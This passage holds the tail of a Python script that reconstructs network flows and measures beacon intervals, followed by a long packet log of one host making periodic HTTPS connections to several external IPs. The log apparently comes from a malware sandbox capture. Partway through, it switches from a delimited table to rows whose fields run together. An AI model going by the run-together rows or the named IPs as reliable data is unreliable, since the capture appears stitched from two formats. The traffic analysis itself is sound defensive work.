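    """The flow an IDS alert belongs to, keyed by the client port it reported."""
    return fl.get((alert["src_port"], alert["dst_ip"]))


if __name__ == "__main__":
    fl = flows(parse_rows(SAMPLE_ROWS))
    for (port, rip), f in fl.items():
        print(f"{rip:>16}:{f['rport']} <- :{port}  {f['out']} out / {f['in']} in  "
              f"{(f['end'] - f['start']).total_seconds():.3f}s")
    print("connections per host:", flows_per_remote(fl))
    print("seconds between connection starts:", beacon_intervals(fl))
    print("alert", ALERT["sid"], "fired on flow", flow_for_alert(ALERT, fl))
```

On the sample rows the intervals come out between 4.3 and 6.8 seconds, with 148.251.114.233 receiving four connections and 184.171.244.231 three; on the complete list the per-flow packet counts (handshake plus one short exchange per connection) are what distinguishes periodic check-ins from a bulk download.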
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 5, 2024 10:38:17.871217012 CET | 49704 | 443 | 192.168.2.5 | 93.95.216.175
Dec 5, 2024 10:38:17.871287107 CET | 443 | 49704 | 93.95.216.175 | 192.168.2.5
Dec 5, 2024 10:38:17.871565104 CET | 49704 | 443 | 192.168.2.5 | 93.95.216.175
Dec 5, 2024 10:38:17.976066113 CET | 49704 | 443 | 192.168.2.5 | 93.95.216.175
Dec 5, 2024 10:38:17.976109028 CET | 443 | 49704 | 93.95.216.175 | 192.168.2.5
Dec 5, 2024 10:38:19.419770956 CET | 443 | 49704 | 93.95.216.175 | 192.168.2.5
Dec 5, 2024 10:38:19.419855118 CET | 49704 | 443 | 192.168.2.5 | 93.95.216.175
Dec 5, 2024 10:38:19.423403978 CET | 49704 | 443 | 192.168.2.5 | 93.95.216.175
Dec 5, 2024 10:38:19.423415899 CET | 443 | 49704 | 93.95.216.175 | 192.168.2.5
Dec 5, 2024 10:38:19.423738956 CET | 443 | 49704 | 93.95.216.175 | 192.168.2.5
Dec 5, 2024 10:38:19.441858053 CET | 49704 | 443 | 192.168.2.5 | 93.95.216.175
Dec 5, 2024 10:38:19.483350992 CET | 443 | 49704 | 93.95.216.175 | 192.168.2.5
Dec 5, 2024 10:38:20.133073092 CET | 443 | 49704 | 93.95.216.175 | 192.168.2.5
Dec 5, 2024 10:38:20.133101940 CET | 443 | 49704 | 93.95.216.175 | 192.168.2.5
Dec 5, 2024 10:38:20.133246899 CET | 49704 | 443 | 192.168.2.5 | 93.95.216.175
Dec 5, 2024 10:38:20.133286953 CET | 443 | 49704 | 93.95.216.175 | 192.168.2.5
Dec 5, 2024 10:38:20.178592920 CET | 49704 | 443 | 192.168.2.5 | 93.95.216.175
Dec 5, 2024 10:38:20.227514982 CET | 443 | 49704 | 93.95.216.175 | 192.168.2.5
Dec 5, 2024 10:38:20.227528095 CET | 443 | 49704 | 93.95.216.175 | 192.168.2.5
Dec 5, 2024 10:38:20.227598906 CET | 49704 | 443 | 192.168.2.5 | 93.95.216.175
Dec 5, 2024 10:38:20.227632999 CET | 443 | 49704 | 93.95.216.175 | 192.168.2.5
Dec 5, 2024 10:38:20.272331953 CET | 49704 | 443 | 192.168.2.5 | 93.95.216.175
Dec 5, 2024 10:38:20.322602987 CET | 443 | 49704 | 93.95.216.175 | 192.168.2.5
Dec 5, 2024 10:38:20.322616100 CET | 443 | 49704 | 93.95.216.175 | 192.168.2.5
Dec 5, 2024 10:38:20.322650909 CET | 443 | 49704 | 93.95.216.175 | 192.168.2.5
Dec 5, 2024 10:38:20.322679043 CET | 49704 | 443 | 192.168.2.5 | 93.95.216.175
Dec 5, 2024 10:38:20.322730064 CET | 49704 | 443 | 192.168.2.5 | 93.95.216.175
Dec 5, 2024 10:38:20.356012106 CET | 443 | 49704 | 93.95.216.175 | 192.168.2.5
Dec 5, 2024 10:38:20.356026888 CET | 443 | 49704 | 93.95.216.175 | 192.168.2.5
Dec 5, 2024 10:38:20.356086969 CET | 49704 | 443 | 192.168.2.5 | 93.95.216.175
Dec 5, 2024 10:38:20.356131077 CET | 49704 | 443 | 192.168.2.5 | 93.95.216.175
Dec 5, 2024 10:38:20.356144905 CET | 443 | 49704 | 93.95.216.175 | 192.168.2.5
Dec 5, 2024 10:38:20.381165028 CET | 443 | 49704 | 93.95.216.175 | 192.168.2.5
Dec 5, 2024 10:38:20.381203890 CET | 443 | 49704 | 93.95.216.175 | 192.168.2.5
Dec 5, 2024 10:38:20.381234884 CET | 49704 | 443 | 192.168.2.5 | 93.95.216.175
Dec 5, 2024 10:38:20.381259918 CET | 443 | 49704 | 93.95.216.175 | 192.168.2.5
Dec 5, 2024 10:38:20.381283998 CET | 49704 | 443 | 192.168.2.5 | 93.95.216.175
Dec 5, 2024 10:38:20.422465086 CET | 443 | 49704 | 93.95.216.175 | 192.168.2.5
Dec 5, 2024 10:38:20.422477007 CET | 443 | 49704 | 93.95.216.175 | 192.168.2.5
Dec 5, 2024 10:38:20.422539949 CET | 49704 | 443 | 192.168.2.5 | 93.95.216.175
Dec 5, 2024 10:38:20.422583103 CET | 443 | 49704 | 93.95.216.175 | 192.168.2.5
Dec 5, 2024 10:38:20.475454092 CET | 49704 | 443 | 192.168.2.5 | 93.95.216.175
Dec 5, 2024 10:38:20.506819963 CET | 443 | 49704 | 93.95.216.175 | 192.168.2.5
Dec 5, 2024 10:38:20.506833076 CET | 443 | 49704 | 93.95.216.175 | 192.168.2.5
Dec 5, 2024 10:38:20.506854057 CET | 443 | 49704 | 93.95.216.175 | 192.168.2.5
Dec 5, 2024 10:38:20.506928921 CET | 49704 | 443 | 192.168.2.5 | 93.95.216.175
Dec 5, 2024 10:38:20.506964922 CET | 49704 | 443 | 192.168.2.5 | 93.95.216.175
Dec 5, 2024 10:38:20.521934986 CET | 443 | 49704 | 93.95.216.175 | 192.168.2.5
Dec 5, 2024 10:38:20.521944046 CET | 443 | 49704 | 93.95.216.175 | 192.168.2.5
Dec 5, 2024 10:38:20.521976948 CET | 443 | 49704 | 93.95.216.175 | 192.168.2.5
Dec 5, 2024 10:38:20.521996975 CET | 49704 | 443 | 192.168.2.5 | 93.95.216.175
Dec 5, 2024 10:38:20.522039890 CET | 49704 | 443 | 192.168.2.5 | 93.95.216.175
Dec 5, 2024 10:38:20.522051096 CET | 443 | 49704 | 93.95.216.175 | 192.168.2.5
Dec 5, 2024 10:38:20.539613008 CET | 443 | 49704 | 93.95.216.175 | 192.168.2.5
Dec 5, 2024 10:38:20.539624929 CET | 443 | 49704 | 93.95.216.175 | 192.168.2.5
Dec 5, 2024 10:38:20.539691925 CET | 49704 | 443 | 192.168.2.5 | 93.95.216.175
Dec 5, 2024 10:38:20.539709091 CET | 443 | 49704 | 93.95.216.175 | 192.168.2.5
Dec 5, 2024 10:38:20.552805901 CET | 443 | 49704 | 93.95.216.175 | 192.168.2.5
Dec 5, 2024 10:38:20.552814960 CET | 443 | 49704 | 93.95.216.175 | 192.168.2.5
Dec 5, 2024 10:38:20.552843094 CET | 443 | 49704 | 93.95.216.175 | 192.168.2.5
Dec 5, 2024 10:38:20.552869081 CET | 49704 | 443 | 192.168.2.5 | 93.95.216.175
Dec 5, 2024 10:38:20.552885056 CET | 443 | 49704 | 93.95.216.175 | 192.168.2.5
Dec 5, 2024 10:38:20.552927017 CET | 49704 | 443 | 192.168.2.5 | 93.95.216.175
Dec 5, 2024 10:38:20.566163063 CET | 443 | 49704 | 93.95.216.175 | 192.168.2.5
Dec 5, 2024 10:38:20.566174984 CET | 443 | 49704 | 93.95.216.175 | 192.168.2.5
Dec 5, 2024 10:38:20.566239119 CET | 49704 | 443 | 192.168.2.5 | 93.95.216.175
Dec 5, 2024 10:38:20.566278934 CET | 443 | 49704 | 93.95.216.175 | 192.168.2.5
Dec 5, 2024 10:38:20.584125996 CET | 443 | 49704 | 93.95.216.175 | 192.168.2.5
Dec 5, 2024 10:38:20.584136963 CET | 443 | 49704 | 93.95.216.175 | 192.168.2.5
Dec 5, 2024 10:38:20.584233046 CET | 49704 | 443 | 192.168.2.5 | 93.95.216.175
Dec 5, 2024 10:38:20.584275961 CET | 443 | 49704 | 93.95.216.175 | 192.168.2.5
Dec 5, 2024 10:38:20.588386059 CET | 49704 | 443 | 192.168.2.5 | 93.95.216.175
Dec 5, 2024 10:38:22.162107944 CET | 49711 | 443 | 192.168.2.5 | 91.193.42.13
Dec 5, 2024 10:38:22.162197113 CET | 443 | 49711 | 91.193.42.13 | 192.168.2.5
Dec 5, 2024 10:38:22.162283897 CET | 49711 | 443 | 192.168.2.5 | 91.193.42.13
Dec 5, 2024 10:38:22.162650108 CET | 49711 | 443 | 192.168.2.5 | 91.193.42.13
Dec 5, 2024 10:38:22.162681103 CET | 443 | 49711 | 91.193.42.13 | 192.168.2.5
Dec 5, 2024 10:38:23.617171049 CET | 443 | 49711 | 91.193.42.13 | 192.168.2.5
Dec 5, 2024 10:38:23.617276907 CET | 49711 | 443 | 192.168.2.5 | 91.193.42.13
Dec 5, 2024 10:38:23.618920088 CET | 49711 | 443 | 192.168.2.5 | 91.193.42.13
Dec 5, 2024 10:38:23.618937969 CET | 443 | 49711 | 91.193.42.13 | 192.168.2.5
Dec 5, 2024 10:38:23.619201899 CET | 443 | 49711 | 91.193.42.13 | 192.168.2.5
Dec 5, 2024 10:38:23.620280981 CET | 49711 | 443 | 192.168.2.5 | 91.193.42.13
Dec 5, 2024 10:38:23.667340994 CET | 443 | 49711 | 91.193.42.13 | 192.168.2.5
Dec 5, 2024 10:38:24.069109917 CET | 443 | 49711 | 91.193.42.13 | 192.168.2.5
Dec 5, 2024 10:38:24.116077900 CET | 49711 | 443 | 192.168.2.5 | 91.193.42.13
Dec 5, 2024 10:38:24.116107941 CET | 443 | 49711 | 91.193.42.13 | 192.168.2.5
Dec 5, 2024 10:38:24.162951946 CET | 49711 | 443 | 192.168.2.5 | 91.193.42.13
Dec 5, 2024 10:38:24.188913107 CET | 443 | 49711 | 91.193.42.13 | 192.168.2.5
Dec 5, 2024 10:38:24.188927889 CET | 443 | 49711 | 91.193.42.13 | 192.168.2.5
Dec 5, 2024 10:38:24.188946962 CET | 443 | 49711 | 91.193.42.13 | 192.168.2.5
Dec 5, 2024 10:38:24.188955069 CET | 443 | 49711 | 91.193.42.13 | 192.168.2.5
Dec 5, 2024 10:38:24.188990116 CET | 443 | 49711 | 91.193.42.13 | 192.168.2.5
Dec 5, 2024 10:38:24.189018011 CET | 49711 | 443 | 192.168.2.5 | 91.193.42.13
Dec 5, 2024 10:38:24.189033985 CET | 443 | 49711 | 91.193.42.13 | 192.168.2.5
Dec 5, 2024 10:38:24.189074039 CET | 49711 | 443 | 192.168.2.5 | 91.193.42.13
Dec 5, 2024 10:38:24.241059065 CET | 49711 | 443 | 192.168.2.5 | 91.193.42.13
Dec 5, 2024 10:38:24.294899940 CET | 443 | 49711 | 91.193.42.13 | 192.168.2.5
Dec 5, 2024 10:38:24.294914961 CET | 443 | 49711 | 91.193.42.13 | 192.168.2.5
Dec 5, 2024 10:38:24.294977903 CET | 49711 | 443 | 192.168.2.5 | 91.193.42.13
Dec 5, 2024 10:38:24.294985056 CET | 443 | 49711 | 91.193.42.13 | 192.168.2.5
Dec 5, 2024 10:38:24.295012951 CET | 443 | 49711 | 91.193.42.13 | 192.168.2.5
Dec 5, 2024 10:38:24.295034885 CET | 443 | 49711 | 91.193.42.13 | 192.168.2.5
Dec 5, 2024 10:38:24.295052052 CET | 49711 | 443 | 192.168.2.5 | 91.193.42.13
Dec 5, 2024 10:38:24.295106888 CET | 49711 | 443 | 192.168.2.5 | 91.193.42.13
Dec 5, 2024 10:38:24.300390959 CET | 49711 | 443 | 192.168.2.5 | 91.193.42.13
Dec 5, 2024 10:38:27.716285944 CET | 49733 | 443 | 192.168.2.5 | 148.251.114.233
Dec 5, 2024 10:38:27.716336012 CET | 443 | 49733 | 148.251.114.233 | 192.168.2.5
Dec 5, 2024 10:38:27.716600895 CET | 49733 | 443 | 192.168.2.5 | 148.251.114.233
Dec 5, 2024 10:38:27.719428062 CET | 49733 | 443 | 192.168.2.5 | 148.251.114.233
Dec 5, 2024 10:38:27.719450951 CET | 443 | 49733 | 148.251.114.233 | 192.168.2.5
Dec 5, 2024 10:38:29.125998020 CET | 443 | 49733 | 148.251.114.233 | 192.168.2.5
Dec 5, 2024 10:38:29.126085043 CET | 49733 | 443 | 192.168.2.5 | 148.251.114.233
Dec 5, 2024 10:38:29.129499912 CET | 49733 | 443 | 192.168.2.5 | 148.251.114.233
Dec 5, 2024 10:38:29.129522085 CET | 443 | 49733 | 148.251.114.233 | 192.168.2.5
Dec 5, 2024 10:38:29.129761934 CET | 443 | 49733 | 148.251.114.233 | 192.168.2.5
Dec 5, 2024 10:38:29.142067909 CET | 49733 | 443 | 192.168.2.5 | 148.251.114.233
Dec 5, 2024 10:38:29.183346033 CET | 443 | 49733 | 148.251.114.233 | 192.168.2.5
Dec 5, 2024 10:38:29.669981956 CET | 443 | 49733 | 148.251.114.233 | 192.168.2.5
Dec 5, 2024 10:38:29.670111895 CET | 443 | 49733 | 148.251.114.233 | 192.168.2.5
Dec 5, 2024 10:38:29.670162916 CET | 49733 | 443 | 192.168.2.5 | 148.251.114.233
Dec 5, 2024 10:38:29.675822973 CET | 49733 | 443 | 192.168.2.5 | 148.251.114.233
Dec 5, 2024 10:38:33.917514086 CET | 49745 | 443 | 192.168.2.5 | 148.251.114.233
Dec 5, 2024 10:38:33.917557001 CET | 443 | 49745 | 148.251.114.233 | 192.168.2.5
Dec 5, 2024 10:38:33.917782068 CET | 49745 | 443 | 192.168.2.5 | 148.251.114.233
Dec 5, 2024 10:38:33.918065071 CET | 49745 | 443 | 192.168.2.5 | 148.251.114.233
Dec 5, 2024 10:38:33.918076038 CET | 443 | 49745 | 148.251.114.233 | 192.168.2.5
Dec 5, 2024 10:38:35.315968037 CET | 443 | 49745 | 148.251.114.233 | 192.168.2.5
Dec 5, 2024 10:38:35.324292898 CET | 49745 | 443 | 192.168.2.5 | 148.251.114.233
Dec 5, 2024 10:38:35.324311972 CET | 443 | 49745 | 148.251.114.233 | 192.168.2.5
Dec 5, 2024 10:38:35.861381054 CET | 443 | 49745 | 148.251.114.233 | 192.168.2.5
Dec 5, 2024 10:38:35.861577988 CET | 443 | 49745 | 148.251.114.233 | 192.168.2.5
Dec 5, 2024 10:38:35.861705065 CET | 49745 | 443 | 192.168.2.5 | 148.251.114.233
Dec 5, 2024 10:38:35.862700939 CET | 49745 | 443 | 192.168.2.5 | 148.251.114.233
Dec 5, 2024 10:38:40.720509052 CET | 49765 | 443 | 192.168.2.5 | 184.171.244.231
Dec 5, 2024 10:38:40.720544100 CET | 443 | 49765 | 184.171.244.231 | 192.168.2.5
Dec 5, 2024 10:38:40.720624924 CET | 49765 | 443 | 192.168.2.5 | 184.171.244.231
Dec 5, 2024 10:38:40.720993996 CET | 49765 | 443 | 192.168.2.5 | 184.171.244.231
Dec 5, 2024 10:38:40.721007109 CET | 443 | 49765 | 184.171.244.231 | 192.168.2.5
Dec 5, 2024 10:38:41.986470938 CET | 443 | 49765 | 184.171.244.231 | 192.168.2.5
Dec 5, 2024 10:38:41.986577034 CET | 49765 | 443 | 192.168.2.5 | 184.171.244.231
Dec 5, 2024 10:38:41.991803885 CET | 49765 | 443 | 192.168.2.5 | 184.171.244.231
Dec 5, 2024 10:38:41.991813898 CET | 443 | 49765 | 184.171.244.231 | 192.168.2.5
Dec 5, 2024 10:38:41.992091894 CET | 443 | 49765 | 184.171.244.231 | 192.168.2.5
Dec 5, 2024 10:38:41.993575096 CET | 49765 | 443 | 192.168.2.5 | 184.171.244.231
Dec 5, 2024 10:38:42.039335966 CET | 443 | 49765 | 184.171.244.231 | 192.168.2.5
Dec 5, 2024 10:38:42.445288897 CET | 443 | 49765 | 184.171.244.231 | 192.168.2.5
Dec 5, 2024 10:38:42.445388079 CET | 443 | 49765 | 184.171.244.231 | 192.168.2.5
Dec 5, 2024 10:38:42.445590019 CET | 49765 | 443 | 192.168.2.5 | 184.171.244.231
Dec 5, 2024 10:38:42.446049929 CET | 49765 | 443 | 192.168.2.5 | 184.171.244.231
Dec 5, 2024 10:38:46.447520971 CET | 49777 | 443 | 192.168.2.5 | 148.251.114.233
Dec 5, 2024 10:38:46.447577953 CET | 443 | 49777 | 148.251.114.233 | 192.168.2.5
Dec 5, 2024 10:38:46.447689056 CET | 49777 | 443 | 192.168.2.5 | 148.251.114.233
Dec 5, 2024 10:38:46.447921038 CET | 49777 | 443 | 192.168.2.5 | 148.251.114.233
Dec 5, 2024 10:38:46.447936058 CET | 443 | 49777 | 148.251.114.233 | 192.168.2.5
Dec 5, 2024 10:38:47.847232103 CET | 443 | 49777 | 148.251.114.233 | 192.168.2.5
Dec 5, 2024 10:38:47.848367929 CET | 49777 | 443 | 192.168.2.5 | 148.251.114.233
Dec 5, 2024 10:38:47.848392963 CET | 443 | 49777 | 148.251.114.233 | 192.168.2.5
Dec 5, 2024 10:38:48.394424915 CET | 443 | 49777 | 148.251.114.233 | 192.168.2.5
Dec 5, 2024 10:38:48.394576073 CET | 443 | 49777 | 148.251.114.233 | 192.168.2.5
Dec 5, 2024 10:38:48.394670963 CET | 49777 | 443 | 192.168.2.5 | 148.251.114.233
Dec 5, 2024 10:38:48.395108938 CET | 49777 | 443 | 192.168.2.5 | 148.251.114.233
Dec 5, 2024 10:38:52.400861025 CET | 49793 | 443 | 192.168.2.5 | 184.171.244.231
Dec 5, 2024 10:38:52.400903940 CET | 443 | 49793 | 184.171.244.231 | 192.168.2.5
Dec 5, 2024 10:38:52.401017904 CET | 49793 | 443 | 192.168.2.5 | 184.171.244.231
Dec 5, 2024 10:38:52.401241064 CET | 49793 | 443 | 192.168.2.5 | 184.171.244.231
Dec 5, 2024 10:38:52.401257992 CET | 443 | 49793 | 184.171.244.231 | 192.168.2.5
Dec 5, 2024 10:38:53.671660900 CET | 443 | 49793 | 184.171.244.231 | 192.168.2.5
Dec 5, 2024 10:38:53.672878981 CET | 49793 | 443 | 192.168.2.5 | 184.171.244.231
Dec 5, 2024 10:38:53.672899961 CET | 443 | 49793 | 184.171.244.231 | 192.168.2.5
Dec 5, 2024 10:38:54.133630991 CET | 443 | 49793 | 184.171.244.231 | 192.168.2.5
Dec 5, 2024 10:38:54.133713961 CET | 443 | 49793 | 184.171.244.231 | 192.168.2.5
Dec 5, 2024 10:38:54.133805990 CET | 49793 | 443 | 192.168.2.5 | 184.171.244.231
Dec 5, 2024 10:38:54.134248018 CET | 49793 | 443 | 192.168.2.5 | 184.171.244.231
Dec 5, 2024 10:38:58.216638088 CET | 49808 | 443 | 192.168.2.5 | 148.251.114.233
Dec 5, 2024 10:38:58.216700077 CET | 443 | 49808 | 148.251.114.233 | 192.168.2.5
Dec 5, 2024 10:38:58.216769934 CET | 49808 | 443 | 192.168.2.5 | 148.251.114.233
Dec 5, 2024 10:38:58.217051029 CET | 49808 | 443 | 192.168.2.5 | 148.251.114.233
Dec 5, 2024 10:38:58.217068911 CET | 443 | 49808 | 148.251.114.233 | 192.168.2.5
Dec 5, 2024 10:38:59.616221905 CET | 443 | 49808 | 148.251.114.233 | 192.168.2.5
Dec 5, 2024 10:38:59.617410898 CET | 49808 | 443 | 192.168.2.5 | 148.251.114.233
Dec 5, 2024 10:38:59.617443085 CET | 443 | 49808 | 148.251.114.233 | 192.168.2.5
Dec 5, 2024 10:39:00.163942099 CET | 443 | 49808 | 148.251.114.233 | 192.168.2.5
Dec 5, 2024 10:39:00.164124012 CET | 443 | 49808 | 148.251.114.233 | 192.168.2.5
Dec 5, 2024 10:39:00.164211035 CET | 49808 | 443 | 192.168.2.5 | 148.251.114.233
Dec 5, 2024 10:39:00.164557934 CET | 49808 | 443 | 192.168.2.5 | 148.251.114.233
Dec 5, 2024 10:39:04.181821108 CET | 49820 | 443 | 192.168.2.5 | 184.171.244.231
Dec 5, 2024 10:39:04.181857109 CET | 443 | 49820 | 184.171.244.231 | 192.168.2.5
Dec 5, 2024 10:39:04.181950092 CET | 49820 | 443 | 192.168.2.5 | 184.171.244.231
Dec 5, 2024 10:39:04.182141066 CET | 49820 | 443 | 192.168.2.5 | 184.171.244.231
Dec 5, 2024 10:39:04.182149887 CET | 443 | 49820 | 184.171.244.231 | 192.168.2.5
Dec 5, 2024 10:39:05.444397926 CET | 443 | 49820 | 184.171.244.231 | 192.168.2.5
Dec 5, 2024 10:39:05.445478916 CET | 49820 | 443 | 192.168.2.5 | 184.171.244.231
                                                                    Dec 5, 2024 10:39:05.445519924 CET44349820184.171.244.231192.168.2.5
                                                                    Dec 5, 2024 10:39:05.905227900 CET44349820184.171.244.231192.168.2.5
                                                                    Dec 5, 2024 10:39:05.905292034 CET44349820184.171.244.231192.168.2.5
                                                                    Dec 5, 2024 10:39:05.905409098 CET49820443192.168.2.5184.171.244.231
                                                                    Dec 5, 2024 10:39:05.905843019 CET49820443192.168.2.5184.171.244.231
                                                                    Dec 5, 2024 10:39:09.927925110 CET49837443192.168.2.5148.251.114.233
                                                                    Dec 5, 2024 10:39:09.927964926 CET44349837148.251.114.233192.168.2.5
                                                                    Dec 5, 2024 10:39:09.928051949 CET49837443192.168.2.5148.251.114.233
                                                                    Dec 5, 2024 10:39:09.928316116 CET49837443192.168.2.5148.251.114.233
                                                                    Dec 5, 2024 10:39:09.928338051 CET44349837148.251.114.233192.168.2.5
                                                                    Dec 5, 2024 10:39:11.326132059 CET44349837148.251.114.233192.168.2.5
                                                                    Dec 5, 2024 10:39:11.353029013 CET49837443192.168.2.5148.251.114.233
                                                                    Dec 5, 2024 10:39:11.353039980 CET44349837148.251.114.233192.168.2.5
                                                                    Dec 5, 2024 10:39:11.871618032 CET44349837148.251.114.233192.168.2.5
                                                                    Dec 5, 2024 10:39:11.871783018 CET44349837148.251.114.233192.168.2.5
                                                                    Dec 5, 2024 10:39:11.871855021 CET49837443192.168.2.5148.251.114.233
                                                                    Dec 5, 2024 10:39:11.872186899 CET49837443192.168.2.5148.251.114.233
                                                                    Dec 5, 2024 10:39:15.961779118 CET49853443192.168.2.5184.171.244.231
                                                                    Dec 5, 2024 10:39:15.961855888 CET44349853184.171.244.231192.168.2.5
                                                                    Dec 5, 2024 10:39:15.961956978 CET49853443192.168.2.5184.171.244.231
                                                                    Dec 5, 2024 10:39:15.966101885 CET49853443192.168.2.5184.171.244.231
                                                                    Dec 5, 2024 10:39:15.966135979 CET44349853184.171.244.231192.168.2.5
                                                                    Dec 5, 2024 10:39:17.224693060 CET44349853184.171.244.231192.168.2.5
                                                                    Dec 5, 2024 10:39:17.226859093 CET49853443192.168.2.5184.171.244.231
                                                                    Dec 5, 2024 10:39:17.226907015 CET44349853184.171.244.231192.168.2.5
                                                                    Dec 5, 2024 10:39:17.684885025 CET44349853184.171.244.231192.168.2.5
                                                                    Dec 5, 2024 10:39:17.684954882 CET44349853184.171.244.231192.168.2.5
                                                                    Dec 5, 2024 10:39:17.685031891 CET49853443192.168.2.5184.171.244.231
                                                                    Dec 5, 2024 10:39:17.685399055 CET49853443192.168.2.5184.171.244.231
                                                                    Dec 5, 2024 10:39:21.697789907 CET49864443192.168.2.5148.251.114.233
                                                                    Dec 5, 2024 10:39:21.697822094 CET44349864148.251.114.233192.168.2.5
                                                                    Dec 5, 2024 10:39:21.697961092 CET49864443192.168.2.5148.251.114.233
                                                                    Dec 5, 2024 10:39:21.698156118 CET49864443192.168.2.5148.251.114.233
                                                                    Dec 5, 2024 10:39:21.698167086 CET44349864148.251.114.233192.168.2.5
                                                                    Dec 5, 2024 10:39:23.094451904 CET44349864148.251.114.233192.168.2.5
                                                                    Dec 5, 2024 10:39:23.095748901 CET49864443192.168.2.5148.251.114.233
                                                                    Dec 5, 2024 10:39:23.095772982 CET44349864148.251.114.233192.168.2.5
                                                                    Dec 5, 2024 10:39:23.638715029 CET44349864148.251.114.233192.168.2.5
                                                                    Dec 5, 2024 10:39:23.638854980 CET44349864148.251.114.233192.168.2.5
                                                                    Dec 5, 2024 10:39:23.638953924 CET49864443192.168.2.5148.251.114.233
                                                                    Dec 5, 2024 10:39:23.639358044 CET49864443192.168.2.5148.251.114.233
                                                                    Dec 5, 2024 10:39:27.635020971 CET49880443192.168.2.5184.171.244.231
                                                                    Dec 5, 2024 10:39:27.635068893 CET44349880184.171.244.231192.168.2.5
                                                                    Dec 5, 2024 10:39:27.635173082 CET49880443192.168.2.5184.171.244.231
                                                                    Dec 5, 2024 10:39:27.635421991 CET49880443192.168.2.5184.171.244.231
                                                                    Dec 5, 2024 10:39:27.635438919 CET44349880184.171.244.231192.168.2.5
                                                                    Dec 5, 2024 10:39:28.916153908 CET44349880184.171.244.231192.168.2.5
                                                                    Dec 5, 2024 10:39:28.917471886 CET49880443192.168.2.5184.171.244.231
                                                                    Dec 5, 2024 10:39:28.917526960 CET44349880184.171.244.231192.168.2.5
                                                                    Dec 5, 2024 10:39:29.377135038 CET44349880184.171.244.231192.168.2.5
                                                                    Dec 5, 2024 10:39:29.377218962 CET44349880184.171.244.231192.168.2.5
                                                                    Dec 5, 2024 10:39:29.377290010 CET49880443192.168.2.5184.171.244.231
                                                                    Dec 5, 2024 10:39:29.377775908 CET49880443192.168.2.5184.171.244.231
                                                                    Dec 5, 2024 10:39:33.384874105 CET49896443192.168.2.5148.251.114.233
                                                                    Dec 5, 2024 10:39:33.384929895 CET44349896148.251.114.233192.168.2.5
                                                                    Dec 5, 2024 10:39:33.385019064 CET49896443192.168.2.5148.251.114.233
                                                                    Dec 5, 2024 10:39:33.385266066 CET49896443192.168.2.5148.251.114.233
                                                                    Dec 5, 2024 10:39:33.385277987 CET44349896148.251.114.233192.168.2.5
                                                                    Dec 5, 2024 10:39:34.790050983 CET44349896148.251.114.233192.168.2.5
                                                                    Dec 5, 2024 10:39:34.791306973 CET49896443192.168.2.5148.251.114.233
                                                                    Dec 5, 2024 10:39:34.791337967 CET44349896148.251.114.233192.168.2.5
                                                                    Dec 5, 2024 10:39:35.339215994 CET44349896148.251.114.233192.168.2.5
                                                                    Dec 5, 2024 10:39:35.339716911 CET44349896148.251.114.233192.168.2.5
                                                                    Dec 5, 2024 10:39:35.339792967 CET49896443192.168.2.5148.251.114.233
                                                                    Dec 5, 2024 10:39:35.340066910 CET49896443192.168.2.5148.251.114.233
                                                                    Dec 5, 2024 10:39:39.353570938 CET49910443192.168.2.5184.171.244.231
                                                                    Dec 5, 2024 10:39:39.353621960 CET44349910184.171.244.231192.168.2.5
                                                                    Dec 5, 2024 10:39:39.353725910 CET49910443192.168.2.5184.171.244.231
                                                                    Dec 5, 2024 10:39:39.353940964 CET49910443192.168.2.5184.171.244.231
                                                                    Dec 5, 2024 10:39:39.353959084 CET44349910184.171.244.231192.168.2.5
                                                                    Dec 5, 2024 10:39:40.710479975 CET44349910184.171.244.231192.168.2.5
                                                                    Dec 5, 2024 10:39:40.724128008 CET49910443192.168.2.5184.171.244.231
                                                                    Dec 5, 2024 10:39:40.724169970 CET44349910184.171.244.231192.168.2.5
                                                                    Dec 5, 2024 10:39:41.169826984 CET44349910184.171.244.231192.168.2.5
                                                                    Dec 5, 2024 10:39:41.169895887 CET44349910184.171.244.231192.168.2.5
                                                                    Dec 5, 2024 10:39:41.169945002 CET49910443192.168.2.5184.171.244.231
                                                                    Dec 5, 2024 10:39:41.170401096 CET49910443192.168.2.5184.171.244.231
                                                                    Dec 5, 2024 10:39:45.166038036 CET49922443192.168.2.5148.251.114.233
                                                                    Dec 5, 2024 10:39:45.166107893 CET44349922148.251.114.233192.168.2.5
                                                                    Dec 5, 2024 10:39:45.166194916 CET49922443192.168.2.5148.251.114.233
                                                                    Dec 5, 2024 10:39:45.166419983 CET49922443192.168.2.5148.251.114.233
                                                                    Dec 5, 2024 10:39:45.166443110 CET44349922148.251.114.233192.168.2.5
                                                                    Dec 5, 2024 10:39:46.566977024 CET44349922148.251.114.233192.168.2.5
                                                                    Dec 5, 2024 10:39:46.568583965 CET49922443192.168.2.5148.251.114.233
                                                                    Dec 5, 2024 10:39:46.568643093 CET44349922148.251.114.233192.168.2.5
                                                                    Dec 5, 2024 10:39:47.114424944 CET44349922148.251.114.233192.168.2.5
                                                                    Dec 5, 2024 10:39:47.114615917 CET44349922148.251.114.233192.168.2.5
                                                                    Dec 5, 2024 10:39:47.114763975 CET49922443192.168.2.5148.251.114.233
                                                                    Dec 5, 2024 10:39:47.115236044 CET49922443192.168.2.5148.251.114.233
                                                                    Dec 5, 2024 10:39:51.134663105 CET49937443192.168.2.5184.171.244.231
                                                                    Dec 5, 2024 10:39:51.134731054 CET44349937184.171.244.231192.168.2.5
                                                                    Dec 5, 2024 10:39:51.138669968 CET49937443192.168.2.5184.171.244.231
                                                                    Dec 5, 2024 10:39:51.141617060 CET49937443192.168.2.5184.171.244.231
                                                                    Dec 5, 2024 10:39:51.141633987 CET44349937184.171.244.231192.168.2.5
                                                                    Dec 5, 2024 10:39:52.402894974 CET44349937184.171.244.231192.168.2.5
                                                                    Dec 5, 2024 10:39:52.404118061 CET49937443192.168.2.5184.171.244.231
                                                                    Dec 5, 2024 10:39:52.404129982 CET44349937184.171.244.231192.168.2.5
                                                                    Dec 5, 2024 10:39:52.862955093 CET44349937184.171.244.231192.168.2.5
                                                                    Dec 5, 2024 10:39:52.863025904 CET44349937184.171.244.231192.168.2.5
                                                                    Dec 5, 2024 10:39:52.863095045 CET49937443192.168.2.5184.171.244.231
                                                                    Dec 5, 2024 10:39:52.863563061 CET49937443192.168.2.5184.171.244.231
                                                                    Dec 5, 2024 10:39:56.886121035 CET49952443192.168.2.5148.251.114.233
                                                                    Dec 5, 2024 10:39:56.886154890 CET44349952148.251.114.233192.168.2.5
                                                                    Dec 5, 2024 10:39:56.886240959 CET49952443192.168.2.5148.251.114.233
                                                                    Dec 5, 2024 10:39:56.886543036 CET49952443192.168.2.5148.251.114.233
